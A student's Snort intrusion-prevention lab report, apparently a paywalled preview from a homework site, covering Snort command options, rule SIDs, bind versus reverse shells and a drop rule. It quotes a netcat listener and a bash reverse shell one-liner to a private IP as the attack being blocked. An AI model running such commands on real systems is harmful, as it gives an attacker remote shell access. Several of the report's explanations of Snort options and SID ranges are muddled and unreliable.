lab report 6.edited

docx

School

Technical University of Mombasa *

*We aren’t endorsed by this school

Course

ACH101

Subject

Computer Science

Date

Nov 24, 2024

Type

docx

Pages

9

Uploaded by CoachButterfly5975

Report
1 SNORT Student’s Name Institutional Affiliation Course Instructor’s Name Date
2 Snort 1. In this lab, you used Snort ® . Discuss the most significant benefit of using IDPS and what does it do well? Is there ever a situation where an organization would be justified in not using an IDPS. IDPS have a varsity of benefits. One of the most significant benefits is that it helps in monitoring one’s network for any activities in the network that are an anomaly. It can be done anytime, even when one is away since a log is employed that records all the activities that happened when one was away and when one is back can quickly look at the actions from the catalog. 2. What is the purpose of the following commands? sudo snort -Tc /etc/snort/snort.conf -Qi eth0: eth1 Self-test mode is identified or symbolized by T, which is done before running it. The mode daemon offers the best way to test it before running as an auto service mode. -c signifies the config location of the file specifically, while the -Qi request for output results to listen quietly, and instead of spitting the files out on the terminal, it logs the files. Furthermore, both eth0 and eth1 interface is listened to by it. sudo snort –c /etc/snort/snort.conf –i eth0:eth1 –Q. The -i and eth 1 informs the snort to bridge the interfaces, while the -Q offers crucial information the snort to employ and run in the inline mode. eth 0 is the interface, that is, the 0 snort rules read. What is the purpose of –c and –i in the second command? -c is the one that identifies the configuration location of snort specifically while the interface is specified to listen by the -i. 3. Research Snort documentation online and describe how Sid’s are assigned and the
3 purpose of the msg option in Snort rules. Snort rules are identified uniquely by the keyword Sid. Output plugins use this information that allows them to identify the practices with ease. Rev keyword is employed together with that option. Ranges of Sid are distributed in the following ways; for future use <100 is reserved, Snort distribution includes the following rules: 100-999, and 999, >= one million are employed for local regulations. Sid-msg, map, gen-msg. Map and many more are some of the various -msg. Map files that are used to alert messages from the Sid or gid. Logging and engine alerting are informed by the msg rule option, which offers the news to print a packet dump, \ is readily utilized by the msg rule, which is simple string text, as a character for escape is also used to show a character that discrete. It could, in a way, confuse the parser Snort's rules. 4. In this lab, you used netcat to set up a listener on the Kali machine and executed bash client-side code to return a reverse shell. Netcat can be used to set up bind shells and reverse shells. What is the difference between bind and reverse shells? The shell initiated from the target host back to a box used in an attack in the state of listening to pick a shell is termed as the reverse shell. While the shell on the target host is a setup and binds to particular ports to listen to the connection that is incoming from the attack box, it is known as the bind shell. The backdoor in software that is malicious is the bind shell (Vance, 2020). 5. In the lab, you created a Snort rule based on a hex string. As a part of this question, you will create a Snort rule that would block content based on the non-case sensitive ASCII string "pport@ST. This will block the remote listener and log in to the IPS when an attacker attempts to spawn a remote shell using these commands: nc -lvp 8
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
  • Access to all documents
  • Unlimited textbook solutions
  • 24/7 expert homework help
4 bash –i >& /dev/tcp/192.168.1.5/8 0>&1 below are the screenshots with a detailed description below them. above is a content filtered Wireshark, eth typing that is composed of pport@STA, into the field search that is on the filter toolbar is responsible for filtering the content on the Wireshark
5 Above is the snort rule, with /etc/snort/rules/local rules specify the rules and the saved location.
6 The figure above shows the hex dump, the filtered Wireshark shows that.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
  • Access to all documents
  • Unlimited textbook solutions
  • 24/7 expert homework help
7 The screenshot above shows straight versus no responsive before, without blocking the bash but re-executing it.
8 The IPS log content shows the above step, the drop rule that has been executed, and the snort rule above.
9 References 3.3 Command-Line Options Retrieved from http://books.gigatux.nl/mirror/snortids/0596006616/snortids-CHP-3-SECT- 3.html https://resources.infosecinstitute.com/topic/snort-rules-workshop-part-one/ Mammo, K. (2020). Online Platform for Interactive Tutorials: Cloud-Native Security. Mytilinakis, P. (2020). Attack methods and defenses on Kubernetes (Master's thesis, Πανεπιστήμιο Πειραιώς). Snort 2.9.16.1 User’s Manual (2020, July 24) Snort general options (2019), January 22) Snort general options Retrieved from https://www.sbarjatiya.com/notes_wiki/index.php/Snort_general_rule_options Vance, W. (2020). Linux for Hackers: A Comprehensive Beginners Guide to the World of Hacking using Linux . joiningthedotstv.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
  • Access to all documents
  • Unlimited textbook solutions
  • 24/7 expert homework help

Related Documents

Screen Shot 2023-11-28 at 9.29.05 PM.png
Quiz 3 5 to 7.docx
8.2.1 Exceptions..docx
IBM’s Watson Article on bias in Machine learning Data.docx
Activity.cs
Long Quiz 002 - (7).png
CSIS352_Project_2_.docx
Comprehensive Report (14).pdf
mie449s_2004_exam.pdf
MCV4U Implicit Differentiation.docx
MSIT 5216 Portfolio Activity Unit 7.docx
DBA 1.07 Study Guide.docx
Recommended textbooks for you
Text book image
Fundamentals of Information Systems
Computer Science
ISBN:9781337097536
Author:Ralph Stair, George Reynolds
Publisher:Cengage Learning
Text book image
Management Of Information Security
Computer Science
ISBN:9781337405713
Author:WHITMAN, Michael.
Publisher:Cengage Learning,
Text book image
Principles of Information Systems (MindTap Course...
Computer Science
ISBN:9781305971776
Author:Ralph Stair, George Reynolds
Publisher:Cengage Learning
Text book image
LINUX+ AND LPIC-1 GDE.TO LINUX CERTIF.
Computer Science
ISBN:9781337569798
Author:ECKERT
Publisher:CENGAGE L
Text book image
Systems Architecture
Computer Science
ISBN:9781305080195
Author:Stephen D. Burd
Publisher:Cengage Learning
Text book image
Principles of Information Security (MindTap Cours...
Computer Science
ISBN:9781337102063
Author:Michael E. Whitman, Herbert J. Mattord
Publisher:Cengage Learning
SEE MORE TEXTBOOKS
Recommended textbooks for you
Text book image
Fundamentals of Information Systems
Computer Science
ISBN:9781337097536
Author:Ralph Stair, George Reynolds
Publisher:Cengage Learning
Text book image
Management Of Information Security
Computer Science
ISBN:9781337405713
Author:WHITMAN, Michael.
Publisher:Cengage Learning,
Text book image
Principles of Information Systems (MindTap Course...
Computer Science
ISBN:9781305971776
Author:Ralph Stair, George Reynolds
Publisher:Cengage Learning
Text book image
LINUX+ AND LPIC-1 GDE.TO LINUX CERTIF.
Computer Science
ISBN:9781337569798
Author:ECKERT
Publisher:CENGAGE L
Text book image
Systems Architecture
Computer Science
ISBN:9781305080195
Author:Stephen D. Burd
Publisher:Cengage Learning
Text book image
Principles of Information Security (MindTap Cours...
Computer Science
ISBN:9781337102063
Author:Michael E. Whitman, Herbert J. Mattord
Publisher:Cengage Learning
SEE MORE TEXTBOOKS